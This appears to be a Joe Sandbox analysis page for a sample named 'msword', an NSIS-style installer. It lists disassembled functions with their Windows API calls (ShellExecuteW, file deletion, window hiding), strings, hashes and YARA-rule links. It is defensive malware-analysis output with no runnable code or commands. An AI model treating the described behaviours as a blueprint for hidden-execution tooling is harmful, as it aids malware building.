Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: 229$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-2725386541
Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004283D1,76F923A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004283D1,76F923A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004283D1,76F923A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405EC9
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4

Strings

nsa, xrefs: 00405EB8

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C

Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15

Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4

Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE

Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C

Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09

Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

Non-executed Functions

Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 004049BF
GetDlgItem.USER32(?,00000408), ref: 004049CC
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
LoadBitmapW.USER32(0000006E), ref: 00404A2E
SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
DeleteObject.GDI32(?), ref: 00404AA5
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
ShowWindow.USER32(?,00000005), ref: 00404BFB
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
ImageList_Destroy.COMCTL32(?), ref: 00404DC8
GlobalFree.KERNEL32(?), ref: 00404DD8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
ShowWindow.USER32(?,00000000), ref: 00404F75
GetDlgItem.USER32(?,000003FE), ref: 00404F80
ShowWindow.USER32(00000000), ref: 00404F87

Strings

@, xrefs: 00404BBC
N, xrefs: 00404C32
, xrefs: 00404F65
M, xrefs: 00404B6F

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58

Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
lstrlenW.KERNEL32(?), ref: 00406D58
FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
FindClose.KERNEL32(?), ref: 00406E5F

Strings

RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
Delete: DeleteFile("%s"), xrefs: 00406DE8
Delete: DeleteFile failed("%s"), xrefs: 00406E29
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
ptF, xrefs: 00406D1A
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
\*.*, xrefs: 00406D2F

Memory Dump Source

Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
